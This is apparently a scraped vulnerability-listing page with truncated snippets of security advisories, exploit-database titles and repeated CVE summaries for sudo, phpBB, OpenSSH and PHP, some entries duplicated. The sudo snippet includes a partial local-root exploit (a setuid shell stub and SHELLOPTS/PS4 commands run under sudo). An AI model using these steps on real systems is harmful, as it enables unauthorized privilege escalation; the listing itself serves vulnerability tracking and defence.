Moderate: Red Hat Security Advisory: php security update

Updated PHP packages that fix multiple security issues are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having moderate security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web...

Operator Shell (OSH) 1.7-14 - Local Privilege Escalation

Operator Shell OSH 1.7-14 - Local Privilege Escalation !/bin/sh OSH 1.7-14 Exploit EDUCATIONAL purposes only.... :- by Charles Stevenson core Description: The Operator Shell Osh is a setuid root, security enhanced, restricted shell. It allows the administrator to carefully limit the access of...

Sudo <= 1.6.8p9 (SHELLOPTS/PS4 ENV variables) Local Root Exploit

Exploit for linux platform in category local exploits ================================================================ Sudo int main setuid0; system"/bin/sh"; % % gcc -o egg egg.c % setenv SHELLOPTS xtrace % setenv PS4 '$chown root:root egg' % sudo ./x.sh echo Getting root!! Getting root!! % ls...

Operator Shell (OSH) 1.7-14 - Local Privilege Escalation

!/bin/sh OSH 1.7-14 Exploit EDUCATIONAL purposes only.... :- by Charles Stevenson core Description: The Operator Shell Osh is a setuid root, security enhanced, restricted shell. It allows the administrator to carefully limit the access of special commands and files to the users whose duties requi...

TUVSA-0511-001.txt

=========================================================== Simple PHP Blog: Multiple XSS Vulnerabilities =========================================================== Technical University of Vienna Security Advisory TUVSA-0511-001, November 2, 2005...

FastCGI samples Cross Site Scripting

Two sample CGI's supplied with FastCGI are vulnerable to cross-site scripting attacks. FastCGI is an 'open extension to CGI that provides high performance without the limitations of server specific APIs', and is included in the default installation of the 'Unbreakable' Oracle9i Application Server...

OpenSSH < 3.0.2 'UseLogin Environment Variables' RCE Vulnerability

OpenSSH is prone to a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2005 by EMAZE Networks S.p.A. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

OpenSSH UseLogin Environment Variables

You are running a version of OpenSSH which is older than 3.0.2. Versions prior than 3.0.2 are vulnerable to an environment variables export that can allow a local user to execute command with root privileges. This problem affect only versions prior than 3.0.2, and when the UseLogin feature is...

Network Time Protocol (NTP) / NTPd / NTPsec Detection (UDP)

UDP based detection of services supporting the Network Time Protocol NTP. In addition to the protocol itself the existence of the ntpd NTPd / NTPsec daemon is detected as well. SPDX-FileCopyrightText: 2005 David Lodge SPDX-FileCopyrightText: New / improved code and detection since 2009 Greenbone ...

'printenv' CGI Information Disclosure Vulnerability

The SPDX-FileCopyrightText: 2000 Hendrik Scholz Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription scriptoid"1.3.6.1.4.1.25623.1.0.10188";...

phpBB <= 2.0.17 Multiple Vulnerabilities

The remote host is running a version of phpBB that, if using PHP 5 with 'registerglobals' enabled, fails to properly deregister global variables as well as failing to initialize several variables in various scripts. An attacker may be able to exploit these issues to execute arbitrary code or to...

CVE-2005-3418

Multiple cross-site scripting XSS vulnerabilities in phpBB 2.0.17 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 errormsg parameter to usercpregister.php, 2 forwardpage parameter to login.php, and 3 listcat parameter to search.php, which are not initialized as...

CVE-2005-3417

phpBB 2.0.17 and earlier, when the registerlongarrays directive is disabled, allows remote attackers to modify global variables and bypass security mechanisms because PHP does not define the associated HTTP variables...

CVE-2005-3417

phpBB 2.0.17 and earlier, when the registerlongarrays directive is disabled, allows remote attackers to modify global variables and bypass security mechanisms because PHP does not define the associated HTTP variables...

CVE-2005-3418

Multiple cross-site scripting XSS vulnerabilities in phpBB 2.0.17 and earlier allow remote attackers to inject arbitrary web script or HTML via the 1 errormsg parameter to usercpregister.php, 2 forwardpage parameter to login.php, and 3 listcat parameter to search.php, which are not initialized as...

CVE-2005-3417

phpBB 2.0.17 and earlier, when the registerlongarrays directive is disabled, allows remote attackers to modify global variables and bypass security mechanisms because PHP does not define the associated HTTP variables...

CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...

DEBIAN-CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...

CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...

CVE-2005-2959

Incomplete blacklist vulnerability in sudo 1.6.8 and earlier allows local users to gain privileges via the 1 SHELLOPTS and 2 PS4 environment variables before executing a bash script on behalf of another user, which are not cleared even though other variables are...